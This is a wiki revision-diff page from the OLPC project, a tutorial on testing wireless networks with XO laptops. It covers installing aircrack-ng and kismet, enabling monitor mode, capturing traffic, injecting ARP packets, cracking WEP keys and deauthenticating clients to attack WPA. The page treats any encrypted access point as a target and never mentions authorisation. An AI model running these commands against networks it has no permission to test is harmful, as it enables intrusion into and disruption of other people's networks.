Wireless network hacking: Difference between revisions

From OLPC
Jump to navigation Jump to search
mNo edit summary
No edit summary
 
(35 intermediate revisions by 22 users not shown)
Line 1: Line 1:
{{Translations}}
{{Translations}}
[[:Wireless network hacking|English]] | [[:Wireless network hacking/lang-es|español]]
{{RightTOC}}
{{RightTOC}}


These instructions describe how to test wireless networks for security holes and how to use the various security softwares with the XO OLPC. However, great care should be taken in using these tools and software as they may brick your XO in the worst case or considerably bloat your configuration. (Especially when saving large data files...)
These instructions describe how to test wireless networks for security holes and how to use the various security softwares with the XO OLPC. However, great care should be taken in using these tools and software as they may brick your XO in the worst case or considerably bloat your configuration. (Especially when saving large data files...)

== XO-1.5 ==
For now, enabling monitor mode on newer XOs is not as simple as on the XO-1. For more information, see [[XO-1.5 Wireless Test Setup]] and [[XO-1.5 Wireless Test Report#Verify_monitor_interface]]


== Updating Your Software/Firmware ==
== Updating Your Software/Firmware ==
Line 14: Line 18:
=== Check Wireless Firmware ===
=== Check Wireless Firmware ===
Check that you have a recent version of the wireless firmware by following these instructions: http://wiki.laptop.org/go/Test_Config_Notes#Update_the_wireless_firmware
Check that you have a recent version of the wireless firmware by following these instructions: http://wiki.laptop.org/go/Test_Config_Notes#Update_the_wireless_firmware

=== Check Software ===




== Install security related software ==
== Install security related software ==
In order to continue we need some network tools:
In order to continue we need some network tools:


*'''wireshark''' - Is the world's foremost network protocol analyzer (formerly known as Ethereal)
wireshark -
*'''kismet''' - Is a 802.11 layer2 wireless network detector, sniffer, and intrusion detection system.
kismet -
*'''aircrack-ng''' - Is a 802.11 WEP/WPA-PSK key cracking program that can recover keys from enough captured data packets
aircrack-ng -
nessus -
*'''nessus''' - Is a well known network vulnerability scanner
*'''bind-utils''' - Is a collection of utilities for querying name servers and looking up hosts.
bind-utils -
*'''traceroute''' - is a computer network tool used to determine the route taken by packets across an IP network.
traceroute -


We can install all of these in one go (in the terminal application):
We can install all of these in one go (in the terminal application):


su
su
yum install wireshark kismet aircrack-ng nessus bind-utils traceroute
yum install wireshark wireshark-gnome kismet aircrack-ng nessus bind-utils traceroute

[[Probably you should use:]]

yum install wireshark_gnome


== Configuration of Network Tools ==
== Configuration of Network Tools ==
Line 44: Line 40:


=== Find a target network ===
=== Find a target network ===
Press the Mesh button and inspect any interesting access point (AP).
Press the Mesh button and inspect any interesting access point (AP). Any AP with a padlock on it is encrypted in one way or another. These are the ones suited for a WEP/WPA crack.

=== Check if the network has some form of security ===
If you can connect to the access point without any trouble, the network is not secured.
Check the instructions at [[#Securing your network]].


=== Collect Network data ===
=== Collect Network data ===


Next we need to collect packet data. The way to do this is by enabling [[tcpdump]] or [[wireshark]]. However, because of some non standard wireless chipsets, we need to do the following:
/sbin/service NetworkManager stop # This service can interfere with monitoring
echo 0x7 > /sys/class/net/eth0/device/net/eth0/lbs_rtap # Enable monitor mode
ifconfig rtap0 up # Bring up the monitor interface
The location of your sys file may be different. You can find it with: <code>find /sys/class -name '*rtap*'</code>


Start dumping the data:
tcpdump -s 128 -i rtap0 -w datadump.cap*

Or use airodump, part of the aircrack-ng package in the olpc repository
airodump-ng --write [dumpfile] rtap0

Then we need to restore everything for normal operation:
ifconfig rtap0 down
echo 0x0 > /sys/class/net/eth0/device/net/eth0/lbs_rtap
/sbin/service NetworkManager start

=== Generate extra packets ===

By using aireplay-ng, we can generate extra packets in a short time, by injecting bogus ARP requests.In this examples we will use: 00:11:22:33:44:55 AP 00:66:77:88:99:AA client. The command is something like:

aireplay-ng -3 -b 00:11:22:33:44:55 -h 00:66:77:88:99:AA eth0


=== Cracking a WEP key ===
=== Cracking a WEP key ===
Follow the instructions at this page: http://docs.lucidinteractive.ca/index.php/Cracking_WEP_and_WPA_Wireless_Networks


Follow the instructions at this page: http://docs.lucidinteractive.ca/index.php/Cracking_WEP_and_WPA_Wireless_Networks
TODO: [[We should write a short distillation of that wiki here.]]
TODO: [[We should write a short distillation of that wiki here.]]


=== Cracking a WPA key ===
==== Using aircrack-ng: ====
aireplay-ng -3 -b 00:11:22:33:44:55 -h 00:66:77:88:99:AA eth0
Execute the following command in the terminal application while there is a client succesfully connected to the wireless access point:
Start another console session and enter:
aircrack-ng -z -b 00:11:22:33:44:55 output*.cap
[[using the PTW WEP-cracking method]]
aircrack-ng -b 00:11:22:33:44:55 output*.cap
[[using the FMS/Korek method]]Using the FMS/Korek method you will need approximately 250,000 IVs for 64 bit and 1,500,000 IVs for 128bit keys. Using the PTW method, 40-bit WEP can be cracked with as few as 20,000 data packets and 104-bit WEP with 40,000 data packets.


=== Cracking a WPA key ===
aireplay -0 5 -a <AP MAC> -c <Client MAC> ath0
Execute the following command in the terminal application while there is a client successfully connected to the wireless access point:
aireplay -0 5 -a <AP MAC> -c <Client MAC> ath0
oxygen-00173


=== Cracking a MESH network ===
=== Cracking a MESH network ===

[[to do]]
[[to do]]


== Airtime analysis ==

For checking how much of the medium a give type of traffic is consuming, check [http://wiki.laptop.org/go/Wireless_Artime_Analysis this page]


== For More Info ==
== For More Info ==
Line 74: Line 97:
http://wiki.laptop.org/go/88W8388
http://wiki.laptop.org/go/88W8388
http://wiki.laptop.org/go/Wireless#Capturing_wireless_traffic_on_the_xo
http://wiki.laptop.org/go/Wireless#Capturing_wireless_traffic_on_the_xo
{{Trac|4805}}
http://dev.laptop.org/ticket/4805
http://lists.infradead.org/pipermail/libertas-dev/2007-July/000607.html
http://lists.infradead.org/pipermail/libertas-dev/2007-July/000607.html
http://lists.infradead.org/pipermail/libertas-dev/2007-December/001003.html
http://lists.infradead.org/pipermail/libertas-dev/2007-December/001003.html
Line 81: Line 104:


== References: ==
== References: ==
http://www.wireshark.org/


http://www.wireshark.org/
http://www.kismetwireless.net/
http://www.aircrack-ng.org/doku.php
http://www.nessus.org/nessus/
http://www.tcpdump.org/tcpdump_man.html
http://www.freebsd.org/cgi/man.cgi?query=traceroute
To check what's in the default installation:
http://dev.laptop.org/~bert/joyride-pkgs.html

[[Category:Network]]
[[Category:Security|Wireless network hacking]]
[[Category:Security|Wireless network hacking]]

Latest revision as of 14:27, 3 November 2011

  Please copy/paste "{{Translationlist | xx | origlang=en | translated={{{translated}}}}}" (where xx is ISO 639 language code for your translation) to Wireless network hacking/translations HowTo [ID# 262362]  +/-  

English | español


These instructions describe how to test wireless networks for security holes and how to use the various security softwares with the XO OLPC. However, great care should be taken in using these tools and software as they may brick your XO in the worst case or considerably bloat your configuration. (Especially when saving large data files...)

XO-1.5

For now, enabling monitor mode on newer XOs is not as simple as on the XO-1. For more information, see XO-1.5 Wireless Test Setup and XO-1.5 Wireless Test Report#Verify_monitor_interface

Updating Your Software/Firmware

Check General Firmware

http://wiki.laptop.org/go/Firmware
http://wiki.laptop.org/go/Upgrading_the_firmware

to do

Check Wireless Firmware

Check that you have a recent version of the wireless firmware by following these instructions: http://wiki.laptop.org/go/Test_Config_Notes#Update_the_wireless_firmware

Install security related software

In order to continue we need some network tools:

  • wireshark - Is the world's foremost network protocol analyzer (formerly known as Ethereal)
  • kismet - Is a 802.11 layer2 wireless network detector, sniffer, and intrusion detection system.
  • aircrack-ng - Is a 802.11 WEP/WPA-PSK key cracking program that can recover keys from enough captured data packets
  • nessus - Is a well known network vulnerability scanner
  • bind-utils - Is a collection of utilities for querying name servers and looking up hosts.
  • traceroute - is a computer network tool used to determine the route taken by packets across an IP network.

We can install all of these in one go (in the terminal application):

su
yum install wireshark wireshark-gnome kismet aircrack-ng nessus bind-utils traceroute

Configuration of Network Tools

to do

Performing the Analysis

Find a target network

Press the Mesh button and inspect any interesting access point (AP). Any AP with a padlock on it is encrypted in one way or another. These are the ones suited for a WEP/WPA crack.

Collect Network data

Next we need to collect packet data. The way to do this is by enabling tcpdump or wireshark. However, because of some non standard wireless chipsets, we need to do the following:

/sbin/service NetworkManager stop                       # This service can interfere with monitoring
echo 0x7 > /sys/class/net/eth0/device/net/eth0/lbs_rtap # Enable monitor mode
ifconfig rtap0 up                                       # Bring up the monitor interface

The location of your sys file may be different. You can find it with: find /sys/class -name '*rtap*'

Start dumping the data:

tcpdump -s 128 -i rtap0 -w datadump.cap* 

Or use airodump, part of the aircrack-ng package in the olpc repository

airodump-ng --write [dumpfile] rtap0

Then we need to restore everything for normal operation:

ifconfig rtap0 down
echo 0x0 > /sys/class/net/eth0/device/net/eth0/lbs_rtap
/sbin/service NetworkManager start

Generate extra packets

By using aireplay-ng, we can generate extra packets in a short time, by injecting bogus ARP requests.In this examples we will use: 00:11:22:33:44:55 AP 00:66:77:88:99:AA client. The command is something like:

aireplay-ng -3 -b 00:11:22:33:44:55 -h 00:66:77:88:99:AA eth0

Cracking a WEP key

Follow the instructions at this page: http://docs.lucidinteractive.ca/index.php/Cracking_WEP_and_WPA_Wireless_Networks TODO: We should write a short distillation of that wiki here.

Using aircrack-ng:

aireplay-ng -3 -b 00:11:22:33:44:55 -h 00:66:77:88:99:AA eth0

Start another console session and enter:

aircrack-ng -z -b 00:11:22:33:44:55 output*.cap    

using the PTW WEP-cracking method

aircrack-ng -b 00:11:22:33:44:55 output*.cap       

using the FMS/Korek methodUsing the FMS/Korek method you will need approximately 250,000 IVs for 64 bit and 1,500,000 IVs for 128bit keys. Using the PTW method, 40-bit WEP can be cracked with as few as 20,000 data packets and 104-bit WEP with 40,000 data packets.

Cracking a WPA key

Execute the following command in the terminal application while there is a client successfully connected to the wireless access point:

aireplay -0 5 -a <AP MAC> -c <Client MAC> ath0

oxygen-00173

Cracking a MESH network

to do

Airtime analysis

For checking how much of the medium a give type of traffic is consuming, check this page

For More Info

http://wiki.laptop.org/go/Wireless_Driver_README
http://wiki.laptop.org/go/88W8388
http://wiki.laptop.org/go/Wireless#Capturing_wireless_traffic_on_the_xo
(Trac #4805) 
http://lists.infradead.org/pipermail/libertas-dev/2007-July/000607.html
http://lists.infradead.org/pipermail/libertas-dev/2007-December/001003.html
http://www.hpl.hp.com/personal/Jean_Tourrilhes/Linux/Linux.Wireless.drivers.802.11ag.html
http://www.olpcnews.com/forum/index.php?topic=814.msg13043;topicseen

References:

http://www.wireshark.org/
http://www.kismetwireless.net/
http://www.aircrack-ng.org/doku.php
http://www.nessus.org/nessus/
http://www.tcpdump.org/tcpdump_man.html 

http://www.freebsd.org/cgi/man.cgi?query=traceroute
To check what's in the default installation: 
http://dev.laptop.org/~bert/joyride-pkgs.html